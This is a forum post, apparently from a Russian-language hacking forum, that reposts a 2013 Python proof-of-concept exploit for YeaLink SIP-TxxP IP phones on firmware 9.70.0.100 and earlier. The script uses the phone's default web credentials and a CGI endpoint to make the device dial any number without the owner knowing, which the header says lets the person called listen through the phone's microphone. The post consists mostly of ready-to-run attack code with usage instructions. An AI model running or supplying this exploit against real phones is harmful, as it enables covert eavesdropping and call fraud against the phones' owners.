• XSS.stack #1 – первый литературный журнал от юзеров форума

Web YeaLink IP Phone Firmware 9.70.0.100

DarckSol

(L1) cache
Пользователь
Регистрация
17.03.2008
Сообщения
894
Реакции
182
YeaLink IP Phone firmware versions 9.70.0.100 and below suffer from an unauthenticated phone call vulnerability.

Код:
# Exploit Title: [YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 phone call vulnerability]
# Date: [05-28-2013]
# Exploit Author: [b0hr (francisco<[at]>garnelo.eu)]
# Vendor Homepage: [http://yealink.com]
# Software Link: [ http://yealink.com/product_list.aspx?BaseInfoCateId=147&CateId=147&ProductsCateID=147 ]
# Version: 9.70.0.100 and lower]
# Tested on: [YeaLink IP Phone SIP-T20P and SIP-T26P (hardware VoIP phone)]
# Vulnerability : [It's possible to make calls from using the first available sip account, without supervision or confirmation of the user, also the call receiver can listen through the phone mic .]
 
#!/usr/bin/python
  
import urllib2, sys
  
print "\n YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 phone call vulnerability - b0rh (francisco<[at]>garnelo.eu) - 2013-05-28 \n"
 
if (len(sys.argv) != 3):
    print ">> Use: " + sys.argv[0] + " <IP Phone> <phone number>"
    print ">> Ex: " + sys.argv[0] + " 127.0.0.1 123456789\n"
    exit(0)
  
IP = sys.argv[1]
num = sys.argv[2]
UrlGet_params = 'http://%s/cgi-bin/ConfigManApp.com?Id=34&Command=1&Number=%s&Account=0&sid=0.724202975169738' % (IP, num)
webU = 'user'
webP = 'user'
 
query = urllib2.HTTPPasswordMgrWithDefaultRealm()
query.add_password(None, UrlGet_params, webU, webP)
auth = urllib2.HTTPBasicAuthHandler(query)
log = urllib2.build_opener(auth)
 
 
urllib2.install_opener(log)
 
queryPag = urllib2.urlopen(UrlGet_params)
 
print "\n Call to %s form IP phone %s\n" %(num,IP)
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх